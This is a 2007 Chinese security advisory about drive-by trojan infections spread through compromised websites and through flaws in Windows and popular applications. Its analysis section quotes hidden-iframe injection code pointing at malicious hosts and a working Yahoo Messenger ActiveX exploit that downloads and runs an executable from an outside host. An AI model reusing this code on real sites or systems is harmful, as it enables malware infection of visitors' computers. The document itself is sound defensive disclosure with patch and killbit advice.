近日,根据恶意网址跟踪检测结果分析,发现网站挂马已经成为了木马传播的最主要的渠道,病毒作者通过入侵各种网站、论坛、博客,在其页面上种植网页木马,当用户浏览这些带有网页木马的网站时,如果系统没有打过相应的补丁,就会感染木马病毒,包括各种网游木马,QQ木马,以及网银盗号木马,严重威胁用户的数字财产的安全。
与以往不同的是,近期病毒作者除了利用以前常用的系统漏洞如:MS06-14漏洞、MS07-017漏洞、MS07-004漏洞进行传播木马之外,还盯上了常用的应用软件漏洞,比如各种IM及时聊天工具漏洞、播放器漏洞、网络电视播放软件漏洞,甚至就连搜索工具条的漏洞也成为病毒作者热衷使用的传播手段。
在此,网络巡警提醒广大用户:
一定要给系统打好补丁,可以使用Windows Update功能给系统即使更新到最新的补丁,尤其是MS060-14漏洞、MS07-017漏洞、MS07-004漏洞等网页木马常用漏洞一定要给系统打上。
也可以用KV2007、KV2008内置的“系统漏洞检查”功能来给自己的操作系统做个体检,该功能可以打上系统所缺少的补丁,减少网页木马入侵的可能。
网站挂马现象还会持续发生,建议广大用户不要登陆来历不明的网站,不要点击不陌生的网址连接,避免感染网页木马病毒。
MSN性感相册”蠕虫病毒可能还会出现新的变种,因此建议广大用户不要随意接收从msn对方好友发来的文件,避免感染msn病毒。
QQ尾巴病毒”可能会有新的欺骗手法,提醒广大用户不要轻易相信对方发送来的文件、中奖邀请、电话点歌、朋友汇款、邀请等欺骗手段,避免带来损失。
病毒作者还有可能利用其它的应用软件漏洞进行传播木马病毒,在此建议广大用户使用最新版本的应用软件,包括各种IM及时聊天工具、下载工具、播放器软件、搜索工具条等,避免木马病毒从这些软件漏洞传播进电脑。
附文《利用Yahoo! Messenger 8.1.0 ActiveX控件GetFile方式任意文件上传漏洞挂马的病毒已经出现》,供参考:
根据检测,近期有一个恶意网址利用最新的Yahoo! Messenger 8.1.0 ActiveX控件的一个漏洞进行传播木马,详细分析如下:
恶意网址 http://cool.47555.com/m.js
页面采用iframe框架挂马法,包含的如下恶意代码,
document.writeln(“<iframe style=\’display:none;\’ src=http://58.215.76.197/614.htm><\/iframe>”);
document.writeln(“<iframe style=\’display:none;\’ src=http://cool.47555.com/vvv/06014.htm><\/iframe>”);
document.writeln(“<iframe style=\’display:none;\’ src=http://cool.47555.com/vvv/ya.htm><\/iframe>”);
document.writeln(“<iframe style=\’display:none;\’ src=http://cool.47555.com/vvv/1.htm><\/iframe>”);
document.writeln(“<iframe style=\’display:none;\’ src=http://cool.47555.com/vvv/xx.htm><\/iframe>”);
1. 其中http://58.215.76.197/614.htm页面和http://cool.47555.com/vvv/06014.htm页面采用US-ASCII算法加密,解密后发现这是一个采用VBScript语言编写的页面,该页面利用MS06-014漏洞下载木马病毒:http://cool.47555.com/vvv/444.exe,这是一个木马代理病毒,KV报病毒名称TrojanDownloader.Agent.pps
2. http://cool.47555.com/vvv/ya.htm 页面利用Yahoo! Messenger 8.1.0 ActiveX控件GetFile方式任意文件上传漏洞挂马,该恶意网址的exploits代码如下:
<pre>
<object classid=’clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F’ id=’test’></object>
<script language=’vbscript’>
test.GetFile “http://cool.47555.com/vvv/uu.exe”,”c:\\uu.exe”,5,1,”tiany”
Set WshShell = CreateObject(“WScript.Shell”)
WshShell.Run”uu.exe”
</script>
</pre>
雅虎通的CYFT ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞向用户系统上传任意文件。CYFT ActiveX控件的GetFile()方式没有对用户提交的参数做充分的检查过滤,远程攻击者可以通过提供畸形参数向用户系统的任意位置上传任意文件,然后运行。
该漏洞在milw0rm上的Shellcode代码:http://www.milw0rm.com/exploits/4428
该漏洞的解决方案:
1. 最新版本的Yahoo! Messenger ,官方下载地址:http://cn.messenger.yahoo.com/
2. 注册表中设置killbit :
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\ActiveX Compatibility\{24F3EAD6-8B87-4C1A-97DA-71C126BDA08F}]
“Compatibility Flags”=dword:00000400
3. http://cool.47555.com/vvv/1.htm 页面采用JavaScript 语言编写,并经过八进制转换加密,解秘之后,发现其利用MS06-014漏洞下载病毒文件http://cool.47555.com/vvv/444.exe ,并且执行,这是一个木马代理病毒,KV报病毒名称TrojanDownloader.Agent.pps
4. http://cool.47555.com/vvv/xx.htm页面采用JavaScript 语言编写,该页面利用MS06-014漏洞下载病毒文件http://cool.47555.com/vvv/444.exe ,并且执行,这是一个木马代理病毒,KV报病毒名称TrojanDownloader.Agent.pps
根据近期恶意网页测结果来看,病毒作者除了利用常用系统漏洞MS060-14漏洞、MS07-017漏洞、MS07-004漏洞进行挂马之外,更多的热衷于使用应用软件的漏洞传播木马,由于这些应用软件的用户量极大,因此传播木马的效果也很好,近期较多用的应用软件漏洞如下:
WEB迅雷漏洞
百度搜霸ActiveX控件远程代码执行漏洞
PPStream 堆栈溢出漏洞
暴风影音2 mps.dll组件多个缓冲区溢出漏洞
jetAudio 7.x ActiveX漏洞
迅雷5漏洞
Yahoo! Messenger 8.1.0 ActiveX控件GetFile方式任意文件上传漏洞
请大家立即将以上软件升级到最新版本。
网络巡警
2007-10-09